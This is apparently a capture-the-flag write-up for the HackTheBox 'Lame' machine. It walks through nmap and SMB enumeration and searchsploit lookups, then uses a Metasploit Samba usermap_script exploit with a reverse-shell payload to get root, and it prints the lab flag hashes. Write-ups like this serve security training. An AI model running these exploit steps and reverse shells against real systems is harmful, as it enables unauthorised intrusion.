HTB - Lame
In this write-up, we will explore how to tackle the Lame machine from HackTheBox. Lame is an easy-level machine that was released on 14th March 2017 and runs on Linux. Our objective is to exploit a vulnerability in the smb port to achieve direct root access. Follow along as we break down the process step-by-step.
Enumeration
Run some port scans using nmap…
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# cat scans/alltcp
# Nmap 7.93 scan initiated Thu Mar 2 21:52:10 2023 as: nmap -sT -p- --min-rate 10000 -oN scans/alltcp -Pn lame.htb
Nmap scan report for lame.htb (10.10.10.3)
Host is up (0.034s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
# Nmap done at Thu Mar 2 21:52:31 2023 -- 1 IP address (1 host up) scanned in 21.02 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# cat scans/alludp
# Nmap 7.93 scan initiated Thu Mar 2 21:52:31 2023 as: nmap -sU -p- --min-rate 10000 -oN scans/alludp lame.htb
Nmap scan report for lame.htb (10.10.10.3)
Host is up (0.071s latency).
Not shown: 65531 open|filtered udp ports (no-response)
PORT STATE SERVICE
22/udp closed ssh
139/udp closed netbios-ssn
445/udp closed microsoft-ds
3632/udp closed distcc
# Nmap done at Thu Mar 2 21:52:44 2023 -- 1 IP address (1 host up) scanned in 13.57 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# cat scans/tcpscripts
# Nmap 7.93 scan initiated Thu Mar 2 21:52:44 2023 as: nmap -p 21-22,139,445,3632 -sV -sC -oN scans/tcpscripts lame.htb
Nmap scan report for lame.htb (10.10.10.3)
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_ 2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2023-03-02T21:52:33-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h29m34s, deviation: 3h32m11s, median: -28s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 2 21:53:36 2023 -- 1 IP address (1 host up) scanned in 52.00 seconds
Taking not of the above scan, we can see that the server has FTP open running vsftpd 2.3.4.
With FTP it’s know to allow for anonymous logins, so wouldn’t hurt to search for something usable to extrapolate this version.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# msfconsole -q
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >
Let’s take note of that potential exploit and try it down the road.
Next we can take a look at Samba that’s running, using smbmap to show the anonymous access limits.
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# smbmap -H lame.htb
[+] IP: lame.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
Now we can try to connect anonymously using smbclient.
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# smbmap -H lame.htb
[+] IP: lame.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
I’ll try to login anonymously and see if there’s anything of interest since we have /tmp mapped to it.
1
2
3
4
5
6
7
8
9
10
11
12
13
smb: \> ls
. D 0 Thu Mar 2 22:49:21 2023
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Thu Mar 2 20:45:19 2023
vmware-root DR 0 Thu Mar 2 20:45:47 2023
.X11-unix DH 0 Thu Mar 2 20:45:43 2023
.X0-lock HR 11 Thu Mar 2 20:45:43 2023
5563.jsvc_up R 0 Thu Mar 2 20:46:19 2023
vgauthsvclog.txt.0 R 1600 Thu Mar 2 20:45:17 2023
7282168 blocks of size 1024. 5386480 blocks available
smb: \>
Nothin.
But we can search the version of Samba running on the box being Samba 3.0.20
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# searchsploit Samba 3.0.
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | linux/remote/364.pl
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Foothold
One that seems to pop out the most is the Username Map Script, so let’s take a note on that.
So now that we have two viable attack vectors, we can go back to where we noted our vsftpd exploit and setup our exploit and playload.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts lame.htb
rhosts => lame.htb
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
No luck.
But now we can proceed with the Samba exploit and see if we get any action.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
┌──(root㉿kali)-[/home/…/Desktop/HTB/Boxes/Lame]
└─# msfconsole -q
msf6 > search Samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) >
msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.163 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/samba/usermap_script) > set rhost lame.htb
rhost => lame.htb
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/samba/usermap_script) > set lhost tun0
lhost => 10.10.14.13
msf6 exploit(multi/samba/usermap_script) > set lport 555
lport => 555
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 10.10.14.13:555
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo udDGNvlrgm6H9CKO;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "udDGNvlrgm6H9CKO\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.13:555 -> 10.10.10.3:57812) at 2023-03-02 23:11:55 -0500
Now that we’ve gotten a shell, we can inject a shell using Python pty package to call bash.
1
2
python -c 'import pty; pty.spawn("bash")'
root@lame:/#
Now that we have gained a shell as root, we can locate our flags, firstly the user key.
1
2
3
root@lame:/# find / -name 'user.txt' -exec cat {} \;
find / -name 'user.txt' -exec cat {} \;
1aa466aa8c03c80d12ea96a88980517d
Finally the root key…
1
2
3
root@lame:/# find / -name 'root.txt' -exec cat {} \;
find / -name 'root.txt' -exec cat {} \;
cde67e7033229c29ff8739ddf26cc641
Conclusion
Lastly, Hack the Planet!
This post is licensed under CC BY 4.0 by the author.